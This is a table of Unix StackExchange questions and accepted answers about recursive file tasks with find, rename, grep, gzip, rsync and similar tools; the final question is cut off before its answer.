| date | question_description | accepted_answer | question_title |
|---|---|---|---|
1,321,630,566,000 |
Prepend user-defined string to all files and folders recursively using find and rename.
I’d like to prepend “x “ (no quotes) to a directory and all of its contents down through all subdirectories. I’m a beginner using macOS Mojave 10.14.6 and Terminal. I downloaded rename using Homebrew for this purpose.
Example:
/Old Project
/Old Project/Abstract.rtf
/Old Project/Manuscript.docx
/Old Project/Data Analysis
/Old Project/Data Analysis/Working Syntax.sps
/Old Project/Data Analysis/Working Data.sav
/Old Project/Data Analysis/Cleaned Data.sav
/Old Project/Data Analysis/Figures
/Old Project/Data Analysis/Figures/Figure 1.png
/Old Project/Data Analysis/Figures/Figure 2.png
/Old Project/Data Analysis/Raw Data
/Old Project/Data Analysis/Raw Data/2020-06-26.csv
/Old Project/Ethics
/Old Project/Ethics/Application.pdf
/Old Project/Ethics/Approval.pdf
/Old Project/Ethics/Informed Consent.docx
Desired Result:
/x Old Project
/x Old Project/x Abstract.rtf
/x Old Project/x Manuscript.docx
/x Old Project/x Data Analysis
/x Old Project/x Data Analysis/x Working Syntax.sps
/x Old Project/x Data Analysis/x Working Data.sav
/x Old Project/x Data Analysis/x Cleaned Data.sav
/x Old Project/x Data Analysis/x Figures
/x Old Project/x Data Analysis/x Figures/x Figure 1.png
/x Old Project/x Data Analysis/x Figures/x Figure 2.png
/x Old Project/x Data Analysis/x Raw Data
/x Old Project/x Data Analysis/x Raw Data/x 2020-06-26.csv
/x Old Project/x Ethics
/x Old Project/x Ethics/x Application.pdf
/x Old Project/x Ethics/x Approval.pdf
/x Old Project/x Ethics/x Informed Consent.docx
What I Have So Far:
find . -depth (-execdir OR -exec) rename -n 's/^/x /' {} +
find . List all files and directories recursively within the current working directory. Will output a list of filenames that include the path.
-depth Directs find to start at the lowest depth (at the bottom of the subdirectories) so you don’t run into the problem whereby an un-renamed file in a renamed directory cannot be found because that path no longer exists. (How do I get this find and rename command to work with subdirectories?)
-exec Find will execute the named command (rename) on each item in the list.
-execdir Find will execute the named command (rename) on each item in the list, with one difference - it will first enter each subdirectory then pass only the filename to the rename command (no path).
rename Rename command that uses Perl regular expressions. It cannot handle recursive file renaming on its own, which is why it needs find. Apparently it is a standard command on some systems while there’s another rename command that is standard on other systems, leading to some confusion.
-n Directs rename to show what will happen and not actually run it.
's///' Tells rename to do a substitution, replacing the first section with the second. In my syntax ('s/^/x /'), ^ (the marker for the beginning of the filename) is replaced with "x ".
{} Directs rename to the list of files from find.
+ Tells find the -exec/-execdir clause is over; unlike \;, it passes as many filenames as possible to each invocation of the command.
-exec versus -execdir
-exec passes along the full file path. Rename acts upon the full file path as outlined in the documentation for rename and in the answer to a similar question:
“Note that rename will then operate on the entire path, not just the filename.” (http://plasmasturm.org/code/rename/)
“Temporary note: there is something wrong - the rename pattern does not handle filenames with >path; I'm working on a fix” (https://unix.stackexchange.com/a/153489)
So, if I use -exec, then I would get "x /Old Project/Data Analysis/Figures/Figure 1.png" instead of "/Old Project/Data Analysis/Figures/x Figure 1.png", for example. To solve this, I believe I would have to write a complex regular expression to somehow capture just the filename portion as outlined in this answer to a similar question:
“If you only want to modify the last component, you can anchor your regexp at (\A|?<=/), and make sure that it doesn't match any / and only matches at the last /.” (https://unix.stackexchange.com/a/166886)
I tried the regular expression given in this answer, but it resulted in an error (“Quantifier follows nothing in regex…”) and I’m not actually sure it is meant for my version of rename.
-execdir passes along only the file name, which is promising. In fact, when I dry-run the command, all the planned changes look perfect. However, the actual result is not: it renames files and folders in the main directory but fails to find all other files and folders. It says that they do not exist.
I eventually found this answer:
“find -execdir | rename
This would be the best way to do it if it weren't for the relative path madness, as it avoids Perl regex fu to only act on the basename:
PATH="$(echo "$PATH" | sed -E 's/(^|:)[^\/][^:]*//g')" \
find a -depth -execdir rename 's/(.*)/\L$1/' '{}' \;
-execdir first cds into the directory before executing only on the basename.
Unfortunately, I can't get rid of that PATH hacking part, find -execdir refuses to do anything if you have a relative path in PATH…” (Lowercasing all directories under a directory)
So, as I understand it, the command works in theory, which is why it works in the dry run, but, in practice, find refuses to actually go into each subdirectory for the rename command.
My Questions:
For using exec: Is there a way to isolate the filename from the full file path for rename?
For using execdir: Is there a way to ask find to use or to get absolute path names?
Notes
I'm very new to programming.
I found this very thorough answer (https://stackoverflow.com/a/54163971/13821837) but the syntax doesn't match what works for my system.
|
Using gnu tools:
First install GNU find via
brew install findutils
Then:
gfind . -depth -exec rename -n 's@(?<=/)[\s\w\.-]+$@x $&@' {} \;
With perl rename.
Remove -n switch when the output looks good.
Note
-depth here is very important: it makes find process the files inside a directory before the directory itself, so nothing is renamed before its contents are (depth-first order, mandatory here).
The -n switch of rename stands for dry-run.
Check regex explanations.
The replacement part x $& means a literal x plus a space, followed by $&, the full match of the left side of the substitution s///.
Local test:
./Old Project
./Old Project/Manuscript.docx
./Old Project/Data Analysis
./Old Project/Data Analysis/Working Syntax.sps
./Old Project/Data Analysis/Raw data
./Old Project/Data Analysis/Working Data.sav
./Old Project/Data Analysis/Figures
./Old Project/Data Analysis/Figures/Figure 2.png
./Old Project/Data Analysis/Figures/Figure 1.png
./Old Project/Data Analysis/Raw Data
./Old Project/Data Analysis/Raw Data/2020-06-26.csv
./Old Project/Data Analysis/Cleaned Data.sav
./Old Project/Ethics
./Old Project/Ethics/Informed Consent.docx
./Old Project/Ethics/Application.pdf
./Old Project/Ethics/Approval.pdf
./Old Project/Abstract.rtf
After processing:
./x Old Project
./x Old Project/x Manuscript.docx
./x Old Project/x Data Analysis
./x Old Project/x Data Analysis/x Cleaned Data.sav
./x Old Project/x Data Analysis/x Figures
./x Old Project/x Data Analysis/x Figures/x Figure 2.png
./x Old Project/x Data Analysis/x Figures/x Figure 1.png
./x Old Project/x Data Analysis/x Raw Data
./x Old Project/x Data Analysis/x Raw Data/x 2020-06-26.csv
./x Old Project/x Data Analysis/x Raw data
./x Old Project/x Data Analysis/x Working Data.sav
./x Old Project/x Data Analysis/x Working Syntax.sps
./x Old Project/x Ethics
./x Old Project/x Ethics/x Application.pdf
./x Old Project/x Ethics/x Approval.pdf
./x Old Project/x Ethics/x Informed Consent.docx
./x Old Project/x Abstract.rtf
| Prepend user-defined string to all files and folders recursively using find and rename |
1,321,630,566,000 |
So wget has an ability to recursively download files, however it does it one file at a time.
I would like to pass in a directory URL, and for each URL it encounters in the recursion for it to spawn off a downloading process.
One way I was thinking to do this is to somehow use wget to print out the URLs it encounters, and then feeding those URLs into separate instances of wget (via wget URL_1 &, wget URL_2 & etc).
Any ideas?
|
I've been ruminating on this, and I'm not convinced wget is the best tool for the job here.
Here is how I would do this in the year 2022, using a tool like pup that is specifically designed to parse HTML (in pup's case, with CSS selectors):
wget -q -O- https://ubuntu.com/download/alternative-downloads \
| pup 'a[href$=".torrent"] attr{href}' \
| aria2c -d ~/Downloads -i -
See also
xidel
the -e / --extract option uses XPath selectors by default; supports CSS selectors with --css '<selector>' or --extract 'css("<selector>")'
can fetch internet resources directly—a bit slower than curl on my machine, though
very tolerant parser; almost never seen it complain, even for malformed HTML
examples:
xidel https://www.videlibri.de/xidel.html \
-e '//a[ends-with(@href,"/download")]/@href'
# faster, for some reason; don't forget the '-' (read from stdin)!
curl -q https://www.videlibri.de/xidel.html \
| xidel -e '//a[ends-with(@href,"/download")]/@href' -
# same as above, using CSS selectors + XPath for the attribute
curl -q https://www.videlibri.de/xidel.html \
| xidel -e 'css("a[href$=/download]")/@href' -
xmlstarlet
uses XPath selectors
must have well-formed XML/XHTML as input
piping through xmlstarlet fo -H -R (reformat, expect input as HTML, try to Recover after errors) should fix for most web sites
example:
# NB: my version of xmlstarlet doesn't support XPath 'ends-with'
curl -s https://ubuntu.com/download/alternative-downloads \
| xmlstarlet fo -H -R 2>/dev/null \
| xmlstarlet sel -t -v '//a[contains(@href, ".torrent")]/@href' -n
aria2
| How can I use wget to create a list of URLs from an index.html? |
1,321,630,566,000 |
I'm trying to create a graph of the distribution of file sizes on my ext4 system. I'm trying to write a script to scrape this information from my computer somehow. I don't care where the files are stored in the directory structure, only how much space each takes up. I know file sizes are stored in the inode metadata, and it seems like it might be pretty fast to read through the inode table, if such a thing exists. Does anyone know of a C API for accessing the size of files, or reading directly from the inode table? Does anyone know where the inode table is stored?
|
If you want a C API, you're going to end up with GNU nftw, the GNU file tree walk. DON'T fool yourself into using plain old ftw, you will get inaccurate data. You'll need to write a "per file" function that uses the struct stat that nftw passes into the "per file" function. You can have the "per file" function put file sizes in buckets, or just print out the file size, and then put the numbers in buckets some other way.
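If a quick shell approximation is acceptable before writing the C version, the same bucketing idea can be sketched with find and awk (a rough alternative, not the nftw approach described above; -printf is a GNU find extension):

```shell
# Print every regular file's size, then count files per power-of-two bucket.
find . -type f -printf '%s\n' \
    | awk '{ b = 1; while (b < $1) b *= 2; bucket[b]++ }
           END { for (b in bucket) print b, bucket[b] }' \
    | sort -n
```

Each output line is "bucket-upper-bound count", which is easy to feed into a plotting tool.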
| Fastest way to get list of all file sizes |
1,322,691,968,000 |
I was told by my friend that one can use the -r switch to make find search recursively in directories and subdirectories. Please tell me the error in the given statement; it does not work:
find / -type f -r -name "abc.txt"
|
The reason it doesn't work is because find has no -r option. While it is true that for many programs the -r flag means 'recursive', this is not the case for all and it is not the case for find. The job of find is to search for files and directories, it is not very often that you don't want it to be recursive.
You can check the options of most programs with the man command. For example, man find. Since the manual of find is huge, you might want to search it for the -r option:
$ man find | grep -w -- -r
The -- just tells grep to stop reading options, without it, the -r would be passed as an option to grep. Also, you can search within the man page by hitting / then writing what you want to search for, then enter.
That command returns nothing, compare it with this one which searches the manual of cp:
$ man cp | grep -w -- -r
-R, -r, --recursive
Since find is always recursive, what it does have is the inverse, a flag that lets you choose how many subdirectories it should descend into:
-maxdepth levels
Descend at most levels (a non-negative integer) levels of direc‐
tories below the command line arguments. -maxdepth 0
means only apply the tests and actions to the command line
arguments.
-mindepth levels
Do not apply any tests or actions at levels less than levels (a
non-negative integer). -mindepth 1 means process all files
except the command line arguments.
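A quick sketch of -maxdepth in action on a throwaway tree (the tree itself is made up for the demo):

```shell
# abc.txt exists at depths 1, 2 and 3; -maxdepth 2 skips the deepest copy.
d=$(mktemp -d)
mkdir -p "$d/a/b"
touch "$d/abc.txt" "$d/a/abc.txt" "$d/a/b/abc.txt"
find "$d" -maxdepth 2 -type f -name "abc.txt"   # finds only the first two
```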
So, whenever you have doubts about a command, read its man page because you never know what a particular option might do. For example:
$ man sort | grep -w -- -r
-r, --reverse
$ man mount | grep -w -- -r,
-r, --read-only
$ man awk | grep -A 8 -w -- -r
-r
--re-interval
Enable the use of interval expressions in regular expression
matching (see Regular Expressions, below). Interval expressions
were not traditionally available in the AWK language. The POSIX
standard added them, to make awk and egrep consistent with each
other. They are enabled by default, but this option remains for
use with --traditional.
$ man sed | grep -w -- -r
-r, --regexp-extended
$ man xterm | grep -w -- -r
-r This option indicates that reverse video should be simulated by
swapping the foreground and background colors.
You get the idea.
| find command in linux |
1,322,691,968,000 |
I wrote the following script for finding the number of pdf and tex files in the current directory, including subdirectories and hidden files. The code is able to find the number of pdf files up to 2 levels of subdirectories below, but after that it reports that there are no subdirectories...
#!/bin/bash
touch t.txt
k=`find -type d |wc -l`
k1=`expr $k - 1`
echo $k1
message1="*.pdf *.tex"
count=`ls -al $message1|wc -l`
find -type d > t.txt
i=2
while [ $i -le $k ]
do
kd=`head -$i t.txt|tail -1`
echo $kd
touch $kd/t.txt
cp t.txt $kd/t.txt
i=`expr $i + 1`
done
i=2
while [ $i -le $k ]
do
nd=`head -$i t.txt|tail -1`
set -x
echo $nd
set +x
cd $nd
j=`ls -al $message1|wc -l`
count=`expr $count + $j`
i=`expr $i + 1`
done
#set +x
echo $count
|
find works fine for me:
$ find . -name '*.pdf' -o -name '*.tex' | wc -l
75
$ find . -name '*.pdf' | wc -l
16
$ find . -name '*.tex' | wc -l
59
$ echo $((16+59))
75
Edit:
To handle the special case of newlines in filenames:
$ find . \( -name '*.pdf' -o -name '*.tex' \) -printf x | wc -c
| Script to count files matching a pattern in subdirectories |
1,322,691,968,000 |
Possible Duplicate:
Searching for string in files
Suppose I have a directory called Home and it is my current directory.
And in this home directory I have many other directories
directory1, directory2, etc.
How do I do a grep to find the occurrence of a word (say "AXN") in any of the files in all of these subdirectories (and their subdirectories?)
|
You can use something like:
grep -r "AXN" .
Use -ir if you want it to be case-insensitive.
| How to search all subdirectories and their subdirectories for the occurence of a word using grep? [duplicate] |
1,322,691,968,000 |
Think of it as going to the top-level folder, doing a Ctrl-F find, searching for .DS_Store, and deleting them all.
I want them all deleted, from all subfolders and subfolders subfolders and so on. Basically inside the top level folder, there should be no .DS_Store file anywhere, not even in any of its subfolders.
What would be the command I should enter?
|
find top-folder -type f -name '.DS_Store' -exec rm -f {} +
or, more simply,
find top-folder -type f -name '.DS_Store' -delete
where top-folder is the path to the top folder you'd like to look under.
To print out the paths of the found files before they get deleted:
find top-folder -type f -name '.DS_Store' -print -exec rm -f {} +
| How to remove all occurrences of .DS_Store in a folder |
1,322,691,968,000 |
I'm new to the gzip command, so I googled some commands to run so I can gzip an entire directory recursively. Now while it did that, it converted each of my files to the gzip format and added .gz to the end of each of their filenames. Is there a way to ungzip them all, one by one?
|
There are essentially two options for going through the whole directory tree:
Either you can use find(1):
find . -name '*.gz' -exec gzip -d "{}" \;
or if your shell has recursive globbing you could do something like:
for file in **/*.gz; do gzip -d "$file"; done
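As an aside, GNU gzip can also recurse on its own with -r, so neither find nor recursive globbing is strictly needed (assuming GNU gzip; demonstrated here on a throwaway tree):

```shell
d=$(mktemp -d)
mkdir -p "$d/sub"
echo hello > "$d/sub/file.txt"
gzip "$d/sub/file.txt"   # compresses to file.txt.gz
gzip -dr "$d"            # -d decompress, -r recurse: restores file.txt
```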
| I accidentally GZIPed a whole bunch of files, one by one, instead of using tar(1). How can I undo this mess? |
1,322,691,968,000 |
I have several directories through which I want to recursively iterate over and change the file name of
*.GEOT14246.*
to
*.GEOT15000.*
Is there a bash one-liner to do this, or do I have to write a script with a for loop? My try (which doesn't work) is below:
#!/bin/bash
for file in `find . -type f -name "*.GEOT14246.*"`
do
echo "file = $file"
mv $file *.GEOT15000.*
done
I then call with:
cd /path/to/script/
sh ./script1.sh /path/to/starting/dir
Obviously this doesn't work because I don't think I'm passing the starting directory path as an argument. I'm very new to Unix, so how can I pass arguments to it to say from which directory it should start searching and how do I get the script to work?
|
This should work:
find . -type f -name "*.GEOT14246.*" -print0 | \
xargs -0 rename 's/GEOT14246/GEOT15000/'
given there are no directories named *.GEOT14246.*
A bash variant using find could be something like:
while IFS= read -r -d $'\0' file; do
printf "MV: %-40s => %s\n" "$file" "${file/GEOT14246/GEOT15000}"
mv "$file" "${file/GEOT14246/GEOT15000}"
done < <(find . -type f -name "*.GEOT14246.*" -print0)
Here the . after find is the starting directory, and -print0 ensures there is no hiccup if a filename contains a newline etc.
Relative, but full, paths are passed from find – which you should see from the
printf statement.
The new name is compiled by using bash:
${some_variable/find/replace}
to replace all occurrences of find, use:
${some_variable//find/replace}
etc. More here. This could also be a good read: BashPitfalls, UsingFind.
Read some guides like BashGuide. Find some tutorials on-line, but usually never trust them, ask here or on irc.freenode.net #bash.
You do not need to invoke the script by calling sh. That would run it with the Bourne shell (sh) and not the Bourne Again shell (bash). If you intend to run it with bash, issue bash file. The .sh extension is also out of place.
What you normally do is make the file executable by:
chmod +x script_file
and then run it with:
./script_file
The shebang takes care of what environment the script should run in.
In your script you do not use the passed path name anywhere. The script has an argument list starting from $0, which is the script name; $1 is the first argument, $2 the second, and so on.
In your script you would do something in the direction of:
# Check if argument 1 is a directory, if not exit with error
if ! [[ -d "$1" ]]; then
printf "Usage: %s [PATH]\n" "$(basename "$0")" >&2
exit 1
fi
# OK
path="$1"
while ...
done < <(find "$path" -type f ...)
Your current mv statement would move all files to wherever you issue the command – to one single file named *.GEOT15000.* (each mv overwriting the previous one):
Before script run:
$ tree
.
└── d1
├── a1
│ ├── a2
│ │ ├── a3
│ │ │ └── foo.GEOT14246.faa
│ │ └── foo.GEOT14246.faa
│ └── foo.GEOT14246.faa
└── b1
├── b2
│ ├── b3
│ │ └── foo.GEOT14246.faa
│ └── foo.GEOT14246.faa
└── foo.GEOT14246.faa
After script run:
$ tree
.
├── d1
│ ├── a1
│ │ └── a2
│ │ └── a3
│ └── b1
│ └── b2
│ └── b3
└── *.GEOT15000.*
Also files / paths with spaces or other funny things would make the script go bad and spread havoc. Therefore you have to quote your variables (such as "$file").
| How to rename pattern in one file to another over several directories recursively |
1,322,691,968,000 |
Suppose I have a directory structure like this:
projects/
project1/
src/
node_modules/
dir1/
dir2/
dir3/
file
project2/
node_modules/
dir4/
Starting from projects/ I want to delete the contents of all node_modules/ directories, but I do not want to delete the node_modules/ itself, leaving it empty, without folders or files inside.
In the example above the items dir1, dir2, dir3, file and dir4 would be deleted.
|
The following will delete all files and directories within a path matching node_modules:
find . -path '*/node_modules/*' -delete
If you would like to check what will be deleted first, then omit the -delete action.
| How to recursively delete the contents of all "node_modules" directories (or any dir), starting from current directory, leaving an empty folder? |
1,322,691,968,000 |
I have made a mistake and dumped files together into the same directory. Luckily I can sort them based on the filename:
'''
2019-02-19 20.18.58.ndpi_2_2688_2240.jpg
'''
Where the # bit, or 2 in this specific case, is the location information, as it were. The range is 0-9 and the filenames are all of identical length, so that number will always be in the same position of the filename (26th character including spaces, flanked by underscores). I found this great link:
command to find files by searching only part of their names?
However, I can't pipe the output into the move command. I tried to loop the output into a variable but that didn't seem to work either:
for f in find . -name '*_0_*' ; do mv "$f" /destination/directory ; done
Based on this link, I might have put the * or some quotes in the wrong place: mv: cannot stat No such file or directory in shell script.
That said, I have many directories and I would like to sort them in to an identical directory structure somewhere else:
-Flowers (to be sorted)        -Flowers-buds          -Flowers-stems
   -Roses                         -Roses                 -Roses
       buds.jpg        ===>          buds.jpg    ===>       stems.jpg
       stems.jpg
       petals.jpg
   -Daisies                       -Daisies               -Daisies
       buds.jpg        ===>          buds.jpg    ===>       stems.jpg
       stems.jpg
       petals.jpg
   -Tulips                        -Tulips                -Tulips
       buds.jpg        ===>          buds.jpg    ===>       stems.jpg
       stems.jpg
       petals.jpg
...and more based on that number (#). Is this something that's practical to do in bash? I'm running macOS in the terminal with coreutils installed, so the tools should behave like GNU/Linux instead of Darwin (BSD).
|
The shell is splitting input on whitespace. You can use bash globbing with the recursive ** to get the filenames split properly:
shopt -s globstar
for f in **/*_0_*; do mv "$f" /dest/; done
If they're all going to the same place, the loop is not needed:
shopt -s globstar
mv **/*_0_* /dest/
... or use find -exec, which passes filenames directly from find to an exec() call, without the shell's involvement:
find . -name '*_0_*' -exec mv {} /dest/ \;
Or use read plus find -print0 to split on null. It's overkill for this problem, useful when globbing and find -exec aren't up to the task:
while IFS= read -r -d ''; do mv "$REPLY" /dest/; done < <( find . -name '*_0_*' -print0 )
To change the top-level destination based on the file name, as in your example, cut off pieces of the filename using ${var#remove_from_start} and ${var%remove_from_end}. Wildcards in the remove patterns will remove as little as possible; to remove as much as possible, double the operation character, as in ${…##…} or ${…%%…}:
shopt -s globstar
for f in **/*_0_*; do # Flowers/Roses/stems.jpg
file=${f##*/} # stems.jpg
base=${file%.*} # stems
path=${f%/*} # Flowers/Roses
toppath=${path%%/*} # Flowers
subpath=${path#*/} # Roses
dest=$toppath-$base/$subpath/ # Flowers-stems/Roses/
[[ -d $dest ]] || mkdir -p "$dest"
mv "$f" "$dest"
done
| Sort and mv files based on filename (with spaces), recursively |
1,322,691,968,000 |
I want to recursively delete all files that end with .in. This is taking a long time, and I have many cores available, so I would like to parallelize this process. From this thread, it looks like it's possible to use xargs or make to parallelize find. Is this application of find possible to parallelize?
Here is my current serial command:
find . -name "*.in" -type f -delete
|
Replacing -delete with -print (which is the default) and piping
into GNU parallel should mostly do it:
find . -name '*.in' -type f | parallel rm --
This will run one job per core; use -j N to use N parallel jobs
instead.
It's not completely obvious that this will run much faster than
deleting in sequence, since deleting is probably more I/O- than
CPU-bound, but it would be interesting to test out.
(I said "mostly do it" because the two commands are not fully
equivalent; for example, the parallel version will not do the right
thing if some of your input paths include newline characters.)
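The newline caveat can be avoided with NUL-delimited filenames. A sketch using xargs -0 -P instead of parallel (xargs -P is a common GNU/BSD extension, so treat this as an alternative, not the answer's exact command):

```shell
# Demo tree: three *.in files (one with a space) plus a file to keep.
d=$(mktemp -d)
touch "$d/a.in" "$d/b.in" "$d/with space.in" "$d/keep.txt"
# -print0/-0 make the pipe safe for any filename;
# -n 1 -P 4 runs up to four rm processes at once.
find "$d" -name '*.in' -type f -print0 | xargs -0 -n 1 -P 4 rm --
```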
| Parallelize recursive deletion with find |
1,322,691,968,000 |
I think it's a simple question, but the answer is probably a little more complicated :P
Edit: Actually, it's not complicated at all!^^
So I have a directory with multiple svn projects and I would like to search through all recent files (in trunk folder) by content in all projects.
Here is somewhat the folders look like:
Projects
|
->Project1
| |
| ->tags
| |
| ->trunk
|
->Project2
| |
| ->tags
| |
| ->trunk
...
|
As suggested in comments above:
grep -l some-pattern ./Projects/*/trunk/*
or recursively if there are subdirs under each trunk (and your grep supports -r):
grep -lr some-pattern ./Projects/*/trunk/
| Search for files by content only in trunk subdirectories |
1,322,691,968,000 |
Situation
I have a file where each line has an IP address and I want to see if these Ip's are found in access.log
File name: IpAddressess
Contents example :
192.168.0.1
192.168.0.2
192.168.1.5
etc etc
Now I want to scan access.log for these IP addresses contained in the file IpAddressess
Can I use the command grep for this and what would the command structure look like?
Thank you kindly for any assistance!
|
You are looking for the -f option, described in man grep on my Arch Linux system as:
-f FILE, --file=FILE
Obtain patterns from FILE, one per line. If this option is
used multiple times or is combined with the -e (--regexp)
option, search for all patterns given. The empty file contains
zero patterns, and therefore matches nothing.
However, since grep works with regular expressions and . in regular expressions means "any character", you will also want the -F option, so that 1.2.3 doesn't match things like 10293:
-F, --fixed-strings
Interpret PATTERNS as fixed strings, not regular expressions.
Putting the two together, the command you're looking for is:
grep -Ff IpAddressess access.log
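One caveat: even with -F, a pattern matches anywhere in a line, so 192.168.0.1 would also match inside 192.168.0.10. Adding -w (match whole words only) closes that hole. A small self-contained demonstration with made-up log lines:

```shell
d=$(mktemp -d)
printf '%s\n' '192.168.0.10 - GET /a' '192.168.0.1 - GET /b' > "$d/access.log"
printf '%s\n' '192.168.0.1' > "$d/IpAddressess"
# Without -w this would match both lines; with -w, only the exact IP.
grep -Fwf "$d/IpAddressess" "$d/access.log"
# prints: 192.168.0.1 - GET /b
```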
| How to provide grep a file with ip addresses to look for in access.log |
1,322,691,968,000 |
I'm trying to recursively delete a directory with rm -rf, but this fails because some inner directories don't have the w permission set. I know how to fix this with chmod. However, this requires to iterate over the whole directory twice, which can be slow.
Is there a way to remove such a directory in one go? (Assuming you have enough permissions to give yourself enough permissions)
sudo is not an option (limited user on pc in question).
|
rsync with an empty dummy directory seems fine:
mkdir empty; rsync -r --delete empty/ targetdir/; rmdir empty targetdir
With a 10x repeated test on a simple example, this took 10-14s (14 was an outlier, all others took 10 or 11s),
vs. chmod -R u+w targetdir && rm -rf targetdir, which took 19-25s
and find targetdir -type d -exec chmod 755 {} \; && rm -rf targetdir, which took 12-16s but will likely deteriorate more than rsync with more complex folder structures.
| rm -rf with missing w permissions on directories without root or chmod |
1,322,691,968,000 |
I have an TI DaVinci-based (ARM architecture kin to OMAP) system which netboots using TFTP and NFS-mounted root filesystem, and am trying to make it boot standalone without a netboot server.
The basic approach is to copy the kernel image to the NAND flash and the root filesystem to a connected SATA disk (NAND flash is nowhere near big enough for the whole system), then configure u-boot to load the kernel from NAND flash and pass an appropriate root= argument.
I'm stuck on the step of copying the filesystem. This question is relevant, but none of the recommendations work because I have only busybox versions of the cp and cpio tools, and the --one-file-system option is unsupported by busybox.
How can I clone the root filesystem when I only have the tool capabilities provided by busybox? Would it help to run archive creation commands on the NFS server (x64 architecture running Ubuntu) and then unpack on the target?
|
BusyBox's find supports the -xdev option, so you can make a cpio archive of the root filesystem that way. Unlike tar, cpio does not archive a directory's contents when it archives that directory.
find . -xdev | cpio -H newc -o |
{ cd /mnt && cpio -m -i; }
I don't quite understand why you're building the image from a device though. I'd expect to build a filesystem image using your build scripts on a development machine, and deploy that image.
| clone root directory tree using busybox |
1,322,691,968,000 |
I use this command to make a montage of all the images in a directory:
gmic *jpg -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o -0000."$(date)".jpg
I want to run this command in a directory and its subdirectories recursively. So in each directory I would create a montage of the images in that directory.
I tried:
find -exec gmic *jpg -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o -0000."$(date)".jpg
but it gave me the error
find: missing argument to `-exec'
I also tried
find -exec gmic -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o -0000."$(date)".jpg {} \;
which gave me the following error:
[gmic]-0./ Start G'MIC interpreter.
[gmic]-0./ Output image [] as file '-0000.Fri Mar 13 04:33:44 EDT 2015.jpg', with quality 100%.
[gmic]-0./ *** Error *** Command '-output': File '-0000.Fri Mar 13 04:33:44 EDT 2015.jpg', instance list (0,(nil)) is empty.
[gmic] *** Error in ./ *** Command '-output': File '-0000.Fri Mar 13 04:33:44 EDT 2015.jpg', instance list (0,(nil)) is empty.
|
Ok, so you want to run a command in each directory in a directory tree — the current directory, its subdirectories, their subdirectories, etc. The first thing to do is enumerate the directories in question. With the find command, tell it to list only directories:
find . -type d
The command you want to run in each directory is
gmic ./*jpg -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o -0000."$(date)".jpg
This is a shell command, containing a wildcard expansion and a command substitution. You need to run a shell to execute it. Since this shell will be told what to do by find, it isn't going to be the shell that you're running find in: you need to tell find to run a shell. Pass the directory where you want to act as an argument to the shell.
find . -type d -exec sh -c '…' {} \;
Before you can call gmic, you need to do a couple of things in that script: change to the directory in question, and check that it contains .jpg files.
find . -type d -exec sh -c '
cd "$0" || exit
set -- *.jpg
if [ -e "$1" ]; then
gmic "$@" -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o -0000."$(date)".jpg
fi
' {} \;
Alternatively, you could tell find to list .jpg files. However that makes it difficult to execute the command only one per directory.
If your shell is bash, as opposed to plain sh, you can use its ** wildcard to recurse into directories. This is easier than using find. In bash ≤4.2, beware that ** traverses symbolic links to directories as well. You can simplify the file existence test a little as well.
shopt -s globstar nullglob
for dir in ./**/*/; do
files=("$dir/"*.jpg)
if [[ ${#files[@]} -ne 0 ]]; then
gmic "${files[@]}" -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o "$dir/-0000.$(date)".jpg
fi
done
In zsh, you can use a history modifier in a glob qualifier to enumerate directories containing .jpg files, then filter the resulting array to keep a single copy of each directory.
dirs=(./**/*.jpg(:h))
for dir in ${(u)dirs}; do
gmic $dir/*.jpg -gimp_montage 4,\""V(H(0,1),H(2,V(3,4)))"\",1,1.0,0,5,0,0,0,255,0,0,0,0 -o "$dir/-0000.$(date).jpg"
done
(Aside: -0000.Sat Mar 14 15:51:28 CET 2015.jpg is a really weird name for a file. Files whose name begins with - tend to cause problems because they look like options for commands. Dates are more convenient to manipulate in a format where sorting lexicographically is identical to sorting chronologically, such as 20150314-145128.)
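As an illustration of that aside, date can emit such a sortable stamp directly (the "montage-" prefix below is my own assumption, not from the answer):

```shell
# sortable timestamp, e.g. 20150314-145128; lexicographic order == chronological order
stamp=$(date +%Y%m%d-%H%M%S)
echo "montage-$stamp.jpg"
```

This also sidesteps the leading-dash problem, since the name no longer begins with -.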
| Run a command with wildcards in each subdirectory |
1,322,691,968,000 |
I am interested to know if a single command line that would allow me to recursively copy a folder to all of our NGINX Virtual Host htdocs folders:
I need to copy that folder to all hosts located in vhosts :
/var/www/vhosts/*/htdocs/
|
With all due respect, I don't think the above code/answer is correct.
The "if [ -d dir]" test there was probably meant to be if [[ -d "$dir" ]] (note the $ on the variable and the space before the closing bracket).
The following code should work and do what you want.
vhostdirs=( /var/www/vhosts/* )
for dir in "${vhostdirs[@]}"
do
cp -r "folder_to_be_copied" "$dir/htdocs/"
done
Mind also the quotes " " around the variables which are essential for the white spaces in directory names to be preserved.
| Copy a folder and its content to all Nginx vhosts host |
1,322,691,968,000 |
The Issue
I was using python-skydrive to download files to my PC, and I accidentally corrupted a good amount of my PDF files. When I try to view them in Document Viewer, I get the following error message:
File type plain text document (text/plain) is not supported
$ file ny.pdf
ny.pdf: empty
My Request
I'm looking for a command line tool or snippet that will allow me to recursively find PDF files in a folder and its subfolders, and then move corrupted files to a designated folder.
I'm using Ubuntu 13.10 on an x64 PC.
|
After investigation (see the comments in the question), it appeared that the "corrupted" files were in fact empty. This can happen when a downloading program creates the entries in the filesystem but fails before downloading their content.
To look for them in the current directory and its subdirectories and move them to a directory called trash in your home directory for example, you can use the find command.
find . -name '*.pdf' -size 0 -exec mv -t ~/trash {} \+
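If some damaged files turn out to be non-empty, a stricter sketch is to test for the %PDF- magic header instead of the size (the ./trash location and the -path prune are my assumptions):

```shell
# move any *.pdf that does not start with the %PDF- magic bytes into ./trash
trash=./trash
mkdir -p "$trash"
find . -path "$trash" -prune -o -name '*.pdf' -type f -print |
while IFS= read -r f; do
    head -c 5 -- "$f" | grep -q '%PDF-' || mv -- "$f" "$trash/"
done
```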
| Recursively find and move corrupted PDFs |
1,322,691,968,000 |
I am having to do chmod -R 755 some_dir where 'some_dir' contains '.git' folders. Is there any way I can exclude hidden files and folder when doing recursive chmod?
